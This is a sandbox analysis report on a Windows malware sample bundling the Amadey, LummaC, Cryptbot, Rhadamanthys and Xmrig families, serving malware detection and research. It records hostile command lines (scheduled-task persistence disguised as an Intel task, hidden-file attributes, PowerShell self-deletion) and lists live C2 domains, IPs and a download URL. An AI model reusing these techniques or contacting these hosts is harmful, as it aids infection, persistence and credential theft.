Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random.exe_Y.exe

Overview

General Information

Sample name:random.exe_Y.exe
Analysis ID:1577323
MD5:5c4d6b420293fbf347f649016fab86f8
SHA1:242b846ca8d55d7d40527d2494a1a3d83e9cba1e
SHA256:2f423ea9129684a3f39d3ca8aebc3c470f6895786c4277815307ede64e160deb
Tags:18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected RHADAMANTHYS Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to register a low level keyboard hook
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Leaks process information
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • random.exe_Y.exe (PID: 4072 cmdline: "C:\Users\user\Desktop\random.exe_Y.exe" MD5: 5C4D6B420293FBF347F649016FAB86F8)
    • skotes.exe (PID: 2016 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 5C4D6B420293FBF347F649016FAB86F8)
  • skotes.exe (PID: 4876 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 5C4D6B420293FBF347F649016FAB86F8)
  • skotes.exe (PID: 6044 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 5C4D6B420293FBF347F649016FAB86F8)
    • 4802836d37.exe (PID: 5056 cmdline: "C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 420 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 340 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 3180 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6324 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6368 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 3960 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 5984 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 5440 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 2072 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 4048 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 6644 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 6852 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
          • attrib.exe (PID: 6280 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 352 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 5064 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5976 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 1828 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • d7691cd336.exe (PID: 6316 cmdline: "C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe" MD5: 914BC5E4CA51B1218F63A8539614DCBC)
      • svchost.exe (PID: 1484 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WerFault.exe (PID: 7064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 656 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • c5bc1413d7.exe (PID: 7096 cmdline: "C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)
      • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • c5bc1413d7.exe (PID: 6112 cmdline: "C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)
    • 5b3f6dd868.exe (PID: 3220 cmdline: "C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe" MD5: 3287CE2D6BE3F77C5D1E7CC351F4AD5F)
    • f1e68d5060.exe (PID: 1172 cmdline: "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
      • conhost.exe (PID: 1920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • f1e68d5060.exe (PID: 6492 cmdline: "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
      • f1e68d5060.exe (PID: 4544 cmdline: "C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
  • Intel_PTT_EK_Recertification.exe (PID: 5144 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 2548 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 3896 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 1280 cmdline: "C:\Windows\system32\PING.EXE" 127.1.10.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • Intel_PTT_EK_Recertification.exe (PID: 3804 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 3912 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 3868 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["rapeflowwj.lat", "pancakedipyps.click", "grannyejh.lat", "sustainskelet.lat", "crosshuaht.lat", "necklacebudi.lat", "discokeyus.lat", "aspecteirs.lat", "energyaffai.lat"], "Build id": "FATE99--test"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_CryptbotYara detected CryptbotJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000020.00000002.2790543601.0000000000782000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000020.00000002.2791427646.000000014040B000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000032.00000002.3209991687.000000014040B000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              00000030.00000003.3302895820.0000000001332000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  Click to see the 31 entries
                  SourceRuleDescriptionAuthorStrings
                  36.3.d7691cd336.exe.4ef0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    2.2.skotes.exe.b80000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      36.3.d7691cd336.exe.5110000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                        3.2.skotes.exe.b80000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          0.2.random.exe_Y.exe.a0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            Click to see the 23 entries

                            System Summary

                            barindex
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 6852, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 5064, ProcessName: schtasks.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 6852, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 5064, ProcessName: schtasks.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe, ParentProcessId: 6316, ParentProcessName: d7691cd336.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 1484, ProcessName: svchost.exe
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 6852, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 5976, ProcessName: powershell.exe
                            Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe, ParentProcessId: 6316, ParentProcessName: d7691cd336.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 1484, ProcessName: svchost.exe
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:47:42.965417+010020283713Unknown Traffic192.168.2.649880104.21.64.80443TCP
                            2024-12-18T11:47:45.055165+010020283713Unknown Traffic192.168.2.649886104.21.64.80443TCP
                            2024-12-18T11:48:02.940606+010020283713Unknown Traffic192.168.2.649930172.67.209.202443TCP
                            2024-12-18T11:48:06.653481+010020283713Unknown Traffic192.168.2.649941172.67.209.202443TCP
                            2024-12-18T11:48:11.062331+010020283713Unknown Traffic192.168.2.649955172.67.209.202443TCP
                            2024-12-18T11:48:15.445209+010020283713Unknown Traffic192.168.2.649967172.67.209.202443TCP
                            2024-12-18T11:48:19.322382+010020283713Unknown Traffic192.168.2.649978172.67.209.202443TCP
                            2024-12-18T11:48:23.127805+010020283713Unknown Traffic192.168.2.649990172.67.209.202443TCP
                            2024-12-18T11:48:26.984380+010020283713Unknown Traffic192.168.2.650000172.67.209.202443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:47:44.030488+010020546531A Network Trojan was detected192.168.2.649880104.21.64.80443TCP
                            2024-12-18T11:48:05.383827+010020546531A Network Trojan was detected192.168.2.649930172.67.209.202443TCP
                            2024-12-18T11:48:08.807533+010020546531A Network Trojan was detected192.168.2.649941172.67.209.202443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:47:44.030488+010020498361A Network Trojan was detected192.168.2.649880104.21.64.80443TCP
                            2024-12-18T11:48:05.383827+010020498361A Network Trojan was detected192.168.2.649930172.67.209.202443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:48:08.807533+010020498121A Network Trojan was detected192.168.2.649941172.67.209.202443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:47:42.965417+010020583651Domain Observed Used for C2 Detected192.168.2.649880104.21.64.80443TCP
                            2024-12-18T11:47:45.055165+010020583651Domain Observed Used for C2 Detected192.168.2.649886104.21.64.80443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:47:25.561620+010020446961A Network Trojan was detected192.168.2.649833185.215.113.4380TCP
                            2024-12-18T11:47:34.121562+010020446961A Network Trojan was detected192.168.2.649855185.215.113.4380TCP
                            2024-12-18T11:47:41.298783+010020446961A Network Trojan was detected192.168.2.649873185.215.113.4380TCP
                            2024-12-18T11:47:53.569167+010020446961A Network Trojan was detected192.168.2.649906185.215.113.4380TCP
                            2024-12-18T11:48:01.745121+010020446961A Network Trojan was detected192.168.2.649925185.215.113.4380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:48:26.874139+010020543501A Network Trojan was detected192.168.2.649999185.185.71.17080TCP
                            2024-12-18T11:48:29.202502+010020543501A Network Trojan was detected192.168.2.650010185.185.71.17080TCP
                            2024-12-18T11:48:38.006384+010020543501A Network Trojan was detected192.168.2.650031185.185.71.17080TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:47:41.406695+010020583641Domain Observed Used for C2 Detected192.168.2.6624461.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:47:41.096117+010020583781Domain Observed Used for C2 Detected192.168.2.6648821.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:48:27.391090+010020480941Malware Command and Control Activity Detected192.168.2.650000172.67.209.202443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:47:06.998233+010028561471A Network Trojan was detected192.168.2.649789185.215.113.4380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:47:23.585529+010028561221A Network Trojan was detected185.215.113.4380192.168.2.649796TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-18T11:47:13.770477+010028033053Unknown Traffic192.168.2.64980631.41.244.1180TCP
                            2024-12-18T11:47:27.141306+010028033053Unknown Traffic192.168.2.64983731.41.244.1180TCP
                            2024-12-18T11:47:35.564160+010028033053Unknown Traffic192.168.2.64985931.41.244.1180TCP
                            2024-12-18T11:47:42.741192+010028033053Unknown Traffic192.168.2.64987831.41.244.1180TCP
                            2024-12-18T11:47:55.009611+010028033053Unknown Traffic192.168.2.64991031.41.244.1180TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: random.exe_Y.exeAvira: detected
                            Source: http://185.215.113.43/Zu7JuNko/index.php6879001Avira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.php.usereAvira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.php7HAvira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.php879001Avira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.phpcalAvira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.phpLocalAvira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.phpHHAvira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf0lAvira URL Cloud: Label: malware
                            Source: http://31.41.244.11/files/dodo/random.exeAvira URL Cloud: Label: phishing
                            Source: http://185.215.113.43/Zu7JuNko/index.phpTempAvira URL Cloud: Label: malware
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                            Source: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                            Source: 0000002D.00000002.3098588144.0000000000E99000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "pancakedipyps.click", "grannyejh.lat", "sustainskelet.lat", "crosshuaht.lat", "necklacebudi.lat", "discokeyus.lat", "aspecteirs.lat", "energyaffai.lat"], "Build id": "FATE99--test"}
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeReversingLabs: Detection: 75%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeReversingLabs: Detection: 87%
                            Source: C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exeReversingLabs: Detection: 87%
                            Source: C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exeReversingLabs: Detection: 75%
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 50%
                            Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeReversingLabs: Detection: 66%
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeReversingLabs: Detection: 66%
                            Source: random.exe_Y.exeVirustotal: Detection: 54%Perma Link
                            Source: random.exe_Y.exeReversingLabs: Detection: 50%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJoe Sandbox ML: detected
                            Source: random.exe_Y.exeJoe Sandbox ML: detected

                            Bitcoin Miner

                            barindex
                            Source: Yara matchFile source: 32.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 50.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 49.3.Intel_PTT_EK_Recertification.exe.1ae2b720000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 49.3.Intel_PTT_EK_Recertification.exe.1ae2b720000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.3.Intel_PTT_EK_Recertification.exe.261b8c20000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 31.3.Intel_PTT_EK_Recertification.exe.261b8c20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000020.00000002.2790543601.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000002.2791427646.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000032.00000002.3209991687.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000002.2791286176.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000032.00000002.3123702464.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000020.00000002.2790543601.0000000000778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
